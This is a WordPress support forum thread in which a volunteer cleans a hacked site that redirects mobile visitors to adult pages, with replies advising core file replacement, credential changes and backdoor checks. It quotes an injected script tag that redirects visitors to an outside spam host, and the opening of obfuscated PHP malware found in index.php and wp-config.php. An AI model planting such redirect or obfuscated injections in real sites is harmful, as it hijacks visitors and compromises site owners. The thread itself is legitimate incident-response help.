Support » Fixing WordPress » MS-DOS Files in access-logs (Can't Delete)

  • Resolved nymets1104

    (@nymets1104)


    A friend’s Site, http://crossfittacticalstrength.com was recently hacked with a redirect to random adult sites when viewed on a mobile device. Unfortunately the designer he used is AWOL and no back-ups of the site were made. I am trying to pick up the pieces and have spent some time searching through various files on the site, looking for injected code, without luck. I recently changed the theme to a freshly downloaded version and also re installed wordpress, deleting all previous themes and disabling plugins.

    In 48 hours I have experienced 1 redirect, better than the constant redirects prior to the theme switch, but still an obvious clue we are not clean yet. While looking through the ‘access-logs’ directory, I saw there were 3 files, all updated within the last 24 hours, 2 were updated within a minute of opening the directory. Both were of Filetype ‘MS-DOS Application’. I made copies of both to my local machine and then tried to delete them without success. All three gave a permission denied error and all three appear to be URL or even sub-domains of the website I listed above. Are these legit files or have I finally located a place to start the cleanse?

    Sorry for wordy post, but WordPress is all new to me and I did not want to leave anything out.

    File Names:
    tactical-strength.com
    crossfittacticalstrength.tactical-strength.com
    crossfit.tactical-strength.com

Viewing 15 replies - 1 through 15 (of 16 total)
  • You need to speak to the hosts about this. Those files are nothing to do with WordPress by default. I’d also suggest that You need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Anything less will probably result in the hacker walking straight back into your site again.

    Additional Resources:
    Hardening WordPress
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

    Those ms-dos files I do not think are related to the porn redirect.

    There’s an article here about this infection that might help you:

    http://blog.sucuri.net/2014/05/website-infections-malicious-redirect-to-porn-website-target-wordpress-and-joomla-users.html

    The malware in this case will be injected into the top of your core/theme/plugin files, it is heavily encrypted/obfuscated and not difficult to recognize or remove, but it’s just hard to find exactly which files are compromised.

    If you can find a file that has such code it’s probably going to be the same in all cases, so you can search the contents of your site files for a small string of that bad code and it should show the rest.

    Worst case scenario all you’d need to do is replace all your core files / themes / plugins with fresh copies and that should probably do the trick, and don’t forget to change all your credentials when the infection is cleared.

    Ok, here is an example of an infected wp-content/index.php file so you have some idea what you should be looking for:

    http://pastebin.sucuri.net/24c8nh

    Thread Starter nymets1104

    (@nymets1104)

    Thank You both for your help and informative responses. I have been reading the links provided and will be undertaking a full “disinfection” of the site in the next week or so. I ran the site through the sucuri.net link provided and as no surprise, it flagged the site as containing Malware. It flagged the following script as Known javascript malware.:

    Details: http://labs.sucuri.net/db/malware/spam-seo-suspicious15?v13
    <body><script>top.location.replace("http://www.truthaboutcarboydrates.com/9576c942c1ca37fb5ee3ad8b2e71c336.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102");</script>

    I have ran the sucrui search several times and I have now also received two infected URL’s from the search. Both of these URLs are profile pages on my sitfor two different people. I read the article linked above by @rngdmstr and will be checking the known corrupted files from that blog. I really apppreciate your input so far. I will let you know where I get with this.

    Thread Starter nymets1104

    (@nymets1104)

    I checked:
    /index.php
    /wp-config.php
    /wp-content/themes/index.php (Is this file even needed???)

    and found all contained similar code along the lines of:

    <?php function  XiqWjFiQv3F5FuWwHh($Bawu2EyojGR7k0n69TfQf8laD,$F0e4Xc5jxYOWdYtUVDL9A,$mFrYEDZ89MYdHLgCVDqz){return str_replace($Bawu2EyojGR7k0n69TfQf8laD,$F0e4Xc5jxYOWdYtUVDL9A,$mFrYEDZ89MYdHLgCVDqz);} function  PUYJLZ11nuKA3zw2iewOhC($Bawu2EyojGR7k0n69TfQf8laD,$F0e4Xc5jxYOWdYtUVDL9A,$mFrYEDZ89MYdHLgCVDqz){return str_replace($Bawu2EyojGR7k0n69TfQf8laD,$F0e4Xc5jxYOWdYtUVDL9A,$mFrYEDZ89MYdHLgCVDqz);} function  CnJY68TRDGdgiFPCiapw($Bawu2EyojGR7k0n69TfQf8laD,$F0e4Xc5jxYOWdYtUVDL9A,$mFrYEDZ89MYdHLgCVDqz){return str_replace($Bawu2EyojGR7k0n69TfQf8laD,$F0e4Xc5jxYOWdYtUVDL9A,$mFrYEDZ89MYdHLgCVDqz);} $NgB3J3t1cf1KhZf6Rl = ......

    I replaced both with fresh downloads, but I suspect that I must still have a backdoor somewhere that is allowing the files to be manipulated.

    I will be doing the full sterilization as time allows over the next week. One thing I am leary about when deleting and overwriting these files and crashing the site. As I said above, I am new to wordpress and would hate to jack the site up anymore than it is. In its current state it is hurting my friend’s business more than helping so not much more harm could be done though. Thanks again for your assistance.

    Ok, so you’ve found the infection, or at least part of it – great start!

    Quite often infections like this will compromise pretty much every index.php file it can get its hands on – so if you have a lot of themes and plugins on the site it’s going to be a larger clean-up job. Consider it a good time to do some spring cleaning on the site 🙂

    As for accidentally breaking things, yes, this can happen, so it’s best to make a backup of the site or any files before you make any changes.

    Other files to check for infection will be any header/footer/functions.php files, usually found in themes and plugins.

    As for whether or not wp-content/themes/index.php is necessary: Blank index files are placed in directories in order to prevent them from being viewed publically (otherwise anyone could go to website.com/wp-content/themes and see all the themes that you have installed – based on that they could exploit certain out of date themes that you might have)

    As for backdoors, yes, there is likely one somewhere on the site. They could be anywhere, really, but a good place to check first is wp-config.php and any phpinfo.php files that you might have laying around. You might want to install something like Wordfence or another security plugin that can make this job easier for you.

    If you are unsure about any files or code feel free to pastebin here and I can check them out for you 🙂

    You need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Anything less will probably result in the hacker walking straight back into your site again.

    Additional Resources:
    Hardening WordPress
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

    If you are unsure about any files or code feel free to pastebin here and I can check them out for you 🙂

    No – please do not post hacked files here, thank you.

    @esmi sorry about that! Duly noted.

    Thread Starter nymets1104

    (@nymets1104)

    Update:

    Re installed ALL WP files. Currently running 3.9.1

    Found several improper installations on the site which contained numerous hacked index.php files. I deleted ALL of these.

    Resintalled every single plugin (8 or so) and installed a brand new theme, deleting ALL previous Themes.

    Saved, then deleted the entire uploads folder. Checked each file on my local machine (All were jpg or pngs) and then re-uploaded them back to the site.

    Changed both users password, the database password, the FTP Passwords, and changed all keys in the wp-config file.

    Ran several queries on the Database for suspicous or hacky content and found none.

    Personally checked ALL index.php files, the .htaccess file, the wp-config file. and found no suspicious code on any of them.

    But…
    Still getting redirected to Ba-do**k app page?!?!?!?

    Any suggestions?

    With the time I have invested in this I probably could have made a brand new site. Thanks again for your input

    Thread Starter nymets1104

    (@nymets1104)

    Additionally,

    I installed Wordfence and it detected no problems. I also installed WP clean up to remove old and flagged spam posts from the database.

    Sucuri still flags the site as infected and the “infected URL’ that it shows no longer exists on the site. I specifically deleted this page from the wordpress dashboard, yet it still flags after each re-scan.

    Ok, also check functions.php, header.php and footer.php files – these are common areas for this sort of thing to hide as well. However, you’ve mentioned you’ve installed a fresh copy of your theme so I might also suggest checking your .htaccess file for any evidence of a redirect.

    It should look like this: http://codex.wordpress.org/htaccess

    Is this site on shared hosting? You might also want to check the .htaccess file one or two directories up from your site.

    Update us here if you’re still dealing with the problem we’ll see where else we can dig.

    Thread Starter nymets1104

    (@nymets1104)

    Yes, hosted on bluehost. I installed wordfence and scanned witb 0 problems. When I reinstalled wordpress, I overwrote the files. I am now deleting the files off the server and then putting up fresh ones.

    Something I found odd was on my server I have a public_html folder which has my wordpress install and .htaccess file. I also have a www folder with a .htaccess file and the same wordpress install. Any idea why its there twice?

    The ‘www’ is probably a symlink to /public_html – it’s the same directory, ‘www’ is just like a shortcut there. This is often helpful if public_html is buried a few directories down, but I see it in a lot of cases where it’s not really necessary. It’s not doing any harm though, I’d just leave it.

    I’m seeing your site is still infected. I’ll see if I can pinpoint any particular locations you might need to check, I’ll get back to you as soon as I am able to.

    Ok, just to verify, once all this has been done the infection should be clear:

    1) Cleared out injected code in all affected .PHP files (or replaced with suitable fresh copy) don’t forget to check wp-config.php and scroll down halfway through file to check for backdoor

    2) Replace all core WordPress files

    3) Reinstall all plugins/themes with fresh copy (make sure to check that backup copies are also not infected)

    It sounds like you’ve done most of this already, so the only other thing I can think of is that you may need to clear your site’s cache if you have wp-supercache or any other such plugin.

    Thread Starter nymets1104

    (@nymets1104)

    Update:

    Deleted the entire site off server. Re-installed wordpress only. I did not put uploads or plugins back onto server. Site then passes sucuri check for the first time since this began! I will re-download each plugin later and then my uploads folder. Thanks again for your input and help with this matter.

Viewing 15 replies - 1 through 15 (of 16 total)
  • The topic ‘MS-DOS Files in access-logs (Can't Delete)’ is closed to new replies.